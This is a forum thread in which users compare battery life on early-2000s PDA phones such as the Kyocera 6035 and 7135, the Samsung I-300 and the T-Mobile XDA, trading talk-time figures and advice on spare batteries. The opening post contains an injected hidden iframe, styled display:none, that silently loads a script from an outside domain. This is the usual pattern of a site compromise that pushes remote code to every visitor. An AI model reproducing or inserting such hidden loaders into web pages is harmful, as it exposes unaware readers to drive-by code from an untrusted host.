+ Reply to Thread

Battery life: what can I expect?

Any veteran of pda phones knows that you seldom get the battery times that's advirtised. If I talk an hour a day, can I still use this about an hour of data use?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I am considered a veteran in the Smartphone market, I had the Kyo 6035, the Samsung I-300, and now the T-mobile Pocket Pc, I can tell you that the battery of the 6035 was the greatest, had to charge every only 4 to 5 days!, sometimes even lasted more!. It had an amazing battery life, and also the phone was very rugged. It stood falls, drops, and more. It is big, but also very cheap nowaways. The I300 had a so-so battery life, I actually didn't like it so much, It lasted only 1-2 days under regular use, the only good thing is that right from start the phone comes with 2 batteries, so I guess that's good. The Xda has the best battery for it being a full Pocket PC and a color phone, the average that I get is 2-3 days and with the extended battery is 3-4 days!. I really haven't used the Kyo 7135 so, I really couldn't tell you.

My .0001 cents

battery life

I've played with my phone for about 3 weeks now. I understand the battery life is dependant on a number of factors including usage, time roaming, requirements from service providers... etc. From my use (which so far is pretty extensive), the voice phone talks for about 3 hours. The speaker phone will eat this time quicker. I have two batteries (which I suggest everyone carry) and if I choose to use the phone alot than I would need both to get through the entire day. Roaming does eat alot of batteries as does turning on/off the phone and searching for signals. With the phone on but not in use, the regular pda function seems to last for days. With the phone off, I imagine it would last a very long time (not tested yet). With the phone on and not in use, the mp3 player also seems to last a long time. I have a 4 hour SD card to play with and it seems to easily play the entire 4 hours. The biggest power requirement is the voice phone and phone calls by far. The rest of the mp3/ pda would last a couple of days without the phone on.

Hubert

battery life 7135

I think the battery life of the 7135 is great, as long as you have at least 2 batteries and 3 chargers!

as a new 7135 and having confirmed with kyocera technical, battery life is extremely overstated in the official company promo specs. I am at best getting 12 to 14 per charge and an average of 10 to 20 minutes of talk time. sure you can turn the phone on and off, dim the screen, and various other tricks, but after the 6035 which was incredible, what's thwe point. were i to do it again, i'm not sure i would opt for the 7135.

Originally posted by "architext"

I am at best getting 12 to 14 per charge and an average of 10 to 20 minutes of talk time.
    That seems extremely low. Are you roaming in an analog area? I easily get 24 hours standby and an hour of talk time.

Biggest variable seem to me to be signal strength.

I was very unhappy with battery life when I first got mine. Now seems pretty normal (battery broken in, usage normal)

I do charge mine every night, and carry an extra battery (though rarely need it).

Yeah, sitting on my desk with full signal, talk for a few hours, phone will last 3 days in standby. In adverse signal conditions it may not last the afternoon.
    Chris